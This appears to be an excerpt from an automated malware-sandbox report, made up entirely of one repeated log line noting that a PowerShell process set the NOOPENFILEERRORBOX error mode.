                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
